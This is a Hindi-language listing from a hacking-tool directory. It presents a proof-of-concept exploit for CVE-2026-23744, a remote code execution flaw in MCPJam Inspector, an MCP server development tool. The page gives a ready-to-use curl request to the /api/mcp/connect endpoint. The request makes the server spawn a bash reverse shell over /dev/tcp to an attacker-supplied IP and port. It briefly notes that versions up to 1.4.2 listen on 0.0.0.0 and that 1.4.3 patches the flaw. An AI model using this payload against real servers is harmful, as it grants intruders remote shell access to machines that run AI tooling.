Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-23744-PoC — CVE-2026-23744 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, MCPJam Inspector में एक रिमोट कोड एक्ज़ीक्यूशन कमजोरी। रिवर्स शेल पेलोड के साथ /api/mcp/connect एंडपॉइंट पर तैयार किए गए HTTP अनुरोध के माध्यम से RCE प्रदर्शित करता है। | Kitploit
उपकरण/GitHubGitHub/mrr0b0t19/cve-2026-23744-poc
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरिमोट एक्सेस टूल
GitHubmrr0b0t19/cve-2026-23744-poc

CVE-2026-23744-PoC

CVE-2026-23744 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, MCPJam Inspector में एक रिमोट कोड एक्ज़ीक्यूशन कमजोरी। रिवर्स शेल पेलोड के साथ /api/mcp/connect एंडपॉइंट पर तैयार किए गए HTTP अनुरोध के माध्यम से RCE प्रदर्शित करता है।

रिपॉजिटरी देखें
2 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-23744-PoC

MCP सर्वर में भेद्यता पर PoC।

सही बॉडी के साथ पोस्ट भाग के लिए स्वचालित।

भेद्य पथ:

root@kitploit:~
/api/mcp/connect

curl द्वारा विधि:

root@kitploit:~
curl http://evil.com:6274/api/mcp/connect   --header "Content-Type: application/json"   --data '{"serverConfig":{"command":"bash","args":["-c","bash -i >& /dev/tcp/TUIP/TUPUERTO 0>&1"],"env":{}},"serverId":"pruebaxd"}'

ऐसा क्यों होता है?

MCPJam Inspector MCP सर्वरों के लिए पहला स्थानीय विकास मंच है। संस्करण 1.4.2 और इससे पहले के संस्करण रिमोट कोड निष्पादन (RCE) भेद्यता के प्रति संवेदनशील हैं, जो हमलावर को एक डिज़ाइन की गई HTTP अनुरोध भेजने की अनुमति देता है जो एक MCP सर्वर की स्थापना को सक्रिय करता है, जिससे RCE उत्पन्न होता है। चूंकि MCPJam इंस्पेक्टर डिफ़ॉल्ट रूप से 127.0.0.1 के बजाय 0.0.0.0 पर सुनता है, एक हमलावर एक साधारण HTTP अनुरोध के माध्यम से दूरस्थ रूप से RCE को सक्रिय कर सकता है। संस्करण 1.4.3 में एक पैच है।

टूल डाउनलोड करें